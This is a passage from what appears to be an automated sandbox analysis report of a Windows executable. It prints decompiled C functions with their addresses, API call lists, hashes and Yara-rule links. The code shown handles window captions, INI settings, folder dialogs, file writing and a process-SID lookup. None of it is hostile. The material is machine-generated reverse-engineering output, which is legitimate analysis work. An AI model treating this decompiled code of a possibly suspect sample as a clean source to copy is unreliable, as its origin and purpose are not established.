                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                        • String ID: </%s>
                                                                                                        • API String ID: 3400436232-259020660
                                                                                                        • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                        • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                        • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                        • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                        0x00405e0a
                                                                                                        0x00405e12
                                                                                                        0x00405e18
                                                                                                        0x00405e1c
                                                                                                        0x00405e1e
                                                                                                        0x00405e1e
                                                                                                        0x00405e24
                                                                                                        0x00405e2c
                                                                                                        0x00405e2e
                                                                                                        0x00405e44
                                                                                                        0x00405e49
                                                                                                        0x00405e4c
                                                                                                        0x00405e4d
                                                                                                        0x00405e68
                                                                                                        0x00405e74
                                                                                                        0x00405e74
                                                                                                        0x00000000
                                                                                                        0x00405e84
                                                                                                        0x00405e8c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 1523050162-4135340389
                                                                                                        • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                        • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                        • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                        • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                        0x00409a4a
                                                                                                        0x00409a4f
                                                                                                        0x00409a56
                                                                                                        0x00409a5e
                                                                                                        0x00409a60
                                                                                                        0x00409a6e
                                                                                                        0x00409a6e
                                                                                                        0x00409a60
                                                                                                        0x00409a71
                                                                                                        0x00409a76
                                                                                                        0x00000000
                                                                                                        0x00409a78
                                                                                                        0x00000000
                                                                                                        0x00409a89

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                        • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                        • API String ID: 946536540-379566740
                                                                                                        • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                        • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                        • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                        • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                        0x0040588e
                                                                                                        0x0040588f
                                                                                                        0x0040588f
                                                                                                        0x00405892
                                                                                                        0x00405896
                                                                                                        0x004058a9
                                                                                                        0x004058a9
                                                                                                        0x004058ad
                                                                                                        0x004058af
                                                                                                        0x004058b5
                                                                                                        0x004058b6
                                                                                                        0x004058b9
                                                                                                        0x004058c2
                                                                                                        0x004058c3
                                                                                                        0x004058c8
                                                                                                        0x004058d2
                                                                                                        0x004058d4
                                                                                                        0x004058d9
                                                                                                        0x004058e0
                                                                                                        0x004058ea
                                                                                                        0x004058ec
                                                                                                        0x004058ed
                                                                                                        0x004058f2
                                                                                                        0x004058f9
                                                                                                        0x00405902
                                                                                                        0x00405898
                                                                                                        0x00405898
                                                                                                        0x0040589a
                                                                                                        0x0040589c
                                                                                                        0x004058a1
                                                                                                        0x004058a2
                                                                                                        0x004058a5
                                                                                                        0x004058a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058a7
                                                                                                        0x00405912
                                                                                                        0x00405915
                                                                                                        0x0040591e
                                                                                                        0x0040591e
                                                                                                        0x00405907
                                                                                                        0x0040590b

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865533344-0
                                                                                                        • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                        • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                        • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                        • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 35%
                                                                                                        			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                        0x00409ddc
                                                                                                        0x00409de4
                                                                                                        0x00409df0
                                                                                                        0x00409df5
                                                                                                        0x00409df6
                                                                                                        0x00409e03
                                                                                                        0x00409e05
                                                                                                        0x00409e06
                                                                                                        0x00409e3b
                                                                                                        0x00409e5d
                                                                                                        0x00409e6a
                                                                                                        0x00409e73
                                                                                                        0x00409e75
                                                                                                        0x00409e08
                                                                                                        0x00409e08
                                                                                                        0x00409e19
                                                                                                        0x00409e37
                                                                                                        0x00409e37
                                                                                                        0x00409e81

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00409E08
                                                                                                          • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                          • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                        • memset.MSVCRT ref: 00409E3B
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1127616056-0
                                                                                                        • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                        • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                        • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                        • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                        0x0040ad06
                                                                                                        0x0040ad0a
                                                                                                        0x0040ad0c
                                                                                                        0x0040ad14
                                                                                                        0x0040ad19
                                                                                                        0x0040ad1f
                                                                                                        0x0040ad23
                                                                                                        0x0040ad27
                                                                                                        0x0040ad2a
                                                                                                        0x0040ad2d
                                                                                                        0x0040ad34
                                                                                                        0x0040ad3b
                                                                                                        0x0040ad3e
                                                                                                        0x0040ad44
                                                                                                        0x0040ad48
                                                                                                        0x0040ad4a
                                                                                                        0x0040ad52
                                                                                                        0x0040ad5a
                                                                                                        0x0040ad64
                                                                                                        0x0040ad65
                                                                                                        0x0040ad6b
                                                                                                        0x0040ad6c
                                                                                                        0x0040ad73
                                                                                                        0x0040ad76
                                                                                                        0x0040ad7c
                                                                                                        0x0040ad7c
                                                                                                        0x0040ad7f
                                                                                                        0x0040ad84

                                                                                                        APIs
                                                                                                        • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                        • wcscpy.MSVCRT ref: 0040AD65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3917621476-0
                                                                                                        • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                        • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                        • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                        • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                        0x00404a62
                                                                                                        0x00404a6a
                                                                                                        0x00404a6e
                                                                                                        0x00404a71
                                                                                                        0x00404a74
                                                                                                        0x00404a92
                                                                                                        0x00404a92
                                                                                                        0x00404a76
                                                                                                        0x00404a76
                                                                                                        0x00404a87
                                                                                                        0x00404a90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a90
                                                                                                        0x00404aa3
                                                                                                        0x00404aa7
                                                                                                        0x00404aa7
                                                                                                        0x00404a94
                                                                                                        0x00404a98

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 00404A52
                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 3888421826-0
                                                                                                        • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                        • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                        • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                        • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                        0x004072e0
                                                                                                        0x004072f7
                                                                                                        0x004072fd
                                                                                                        0x00407316
                                                                                                        0x00407342

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004072FD
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                        • strlen.MSVCRT ref: 00407328
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2754987064-0
                                                                                                        • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                        • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                        • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                        • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                        0x00408dd0
                                                                                                        0x00408dd2
                                                                                                        0x00408de2
                                                                                                        0x00408df4
                                                                                                        0x00408e01
                                                                                                        0x00408e1b
                                                                                                        0x00408e21
                                                                                                        0x00408e28
                                                                                                        0x00408e30
                                                                                                        0x00408dd4
                                                                                                        0x00408dd8
                                                                                                        0x00408dd8

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 1386444988-0
                                                                                                        • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                        • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                        • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                        • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                        0x004050e1
                                                                                                        0x004050ec
                                                                                                        0x004050ee
                                                                                                        0x004050f5
                                                                                                        0x004050ff
                                                                                                        0x00405114
                                                                                                        0x00405118
                                                                                                        0x00405123
                                                                                                        0x00405128
                                                                                                        0x00405101
                                                                                                        0x00405109
                                                                                                        0x0040510f
                                                                                                        0x0040512e

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcslen$wcscatwcsncat
                                                                                                        • String ID:
                                                                                                        • API String ID: 291873006-0
                                                                                                        • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                        • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                        • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                        • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                        0x00402de0
                                                                                                        0x00402de2
                                                                                                        0x00402dec
                                                                                                        0x00402def
                                                                                                        0x00402dfb
                                                                                                        0x00402e0c
                                                                                                        0x00402e0e
                                                                                                        0x00402e0e
                                                                                                        0x00402e16
                                                                                                        0x00402e18
                                                                                                        0x00402e1a
                                                                                                        0x00402e21

                                                                                                        APIs
                                                                                                        • GetClientRect.USER32 ref: 00402DEF
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                        • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                          • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                          • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
